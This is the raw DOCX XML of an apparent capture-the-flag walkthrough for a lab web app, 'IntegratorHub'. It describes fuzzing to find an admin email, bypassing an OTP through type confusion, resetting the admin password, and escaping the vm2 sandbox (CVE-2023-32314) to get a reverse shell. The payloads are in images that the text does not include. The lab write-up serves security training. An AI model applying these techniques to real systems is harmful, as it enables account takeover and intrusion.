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INTEGRATOR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IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.vi1gy2swn2lk"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determine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90700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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 the presence of port 80 hosting a web service and port 22 corresponding to SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:spacing w:after="240" w:befor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When accessing port 80 of the web service, an automatic redirection occurs to the domain: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">integratorhub.hc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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10">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943600" cy="2705100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="85"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resolve this, we need to map the IP address to the domain name by adding an entry to the hosts file, as shown in the image below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">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01800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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the application again, we are presented with a login page, but we do not have credentials. We also notice the presence of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Recover Password"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> link.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pP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943600" cy="3581400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Recover Password"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> link, we are prompted for an email associated with IntegratorHub. Since we do not have this email, we can perform fuzzing to find a file that may contain an associated email address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">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943600" cy="3251200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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By performing fuzzing with the wordlist </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"fuzz-Bo0oM.txt"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from SecLists, we discovered the file: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config.json.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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84500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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Inside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config.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we found the email: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin@integratorhub.hc</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which we can use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">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72"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using the discovered email, we are prompted for a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4-digit numeric OTP code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, sent to the corresponding email address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pP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943600" cy="3352800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="82"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do not have access to the OTP sent to the email, we can attempt a brute-force attack. To do this, we intercept the request after providing a code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">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60600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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 that brute-forcing is not possible due to the implementation of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rate limiting</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">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 alternative exploitation technique we can use is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type Confusion attack</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This attack occurs when a variable does not have an explicitly defined type in the code, allowing it to assume any type such as number, string, object, array, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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the code, the variable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">otp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is expected to always be a string when receiving the OTP. However, since there is no strict type enforcement, we can transform it into an array. This scenario allows us to bypass the OTP mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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For a deeper understanding of this vulnerability, it is recommended to watch the lessons in the Hacking Club </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Exploitation (Web)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module, including:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Type Confusion Attack – Filter Bypass</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Type Confusion Attack – ORM (Mongoose)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Type Confusion Attack – ORM (Prisma)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">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knowledge, we can develop a script that generates an array from 0000 to 9999:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">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943600" cy="1739900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="84"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providing the array containing all codes, we successfully bypass the OTP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">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59000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="89"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B">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the successful bypass, we gain access to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/reset-password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> route to change the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">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There are two possible approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyze the JavaScript file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send-otp.js</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and replace the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">temp-token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the new token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">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Intercept the request again, insert the array, and forward it to continue the request flow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">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choose option 1, since we already have the token available.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">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89300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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943600" cy="2120900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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replacing the token and accessing</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/reset-password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we are able to change the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">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25800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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logging into the application, we can access </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/workflow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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90800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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this page, we observe the ability to execute JavaScript code. However, reading the description, we notice that the code will run in a controlled environment (sandbox) and that it uses the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vm2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> library.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pP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943600" cy="3276600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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researching this library, we identified the existence of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2023-32314 – Sandbox Bypass. </w:t>
      </w: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vm2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> library is a sandbox capable of running untrusted code, provided it uses allowed built-in Node modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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Affected versions of this package contain a Sandbox Bypass vulnerability caused by abusing unexpected host object creation via Proxy with malicious code. Exploiting this vulnerability allows an attacker to obtain remote code execution privileges on the host running the sandbox through the Function constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">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br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://security.snyk.io/vuln/SNYK-JS-VM2-5537100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:spacing w:after="240" w:befor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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use the Proof of Concept (PoC) from the referenced link to execute JavaScript code that runs the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pP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943600" cy="3365500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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943600" cy="3314700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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F">
      <w:pPr>
        <w:spacing w:after="240" w:befor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0">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the generated link following the save operation, we can view the output of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">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Based on this, we create new code, this time passing a reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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77"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44">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28800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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44800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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new generated link, we receive the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.e5njnl441q47" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1485900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.dds4sf1kh76i" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
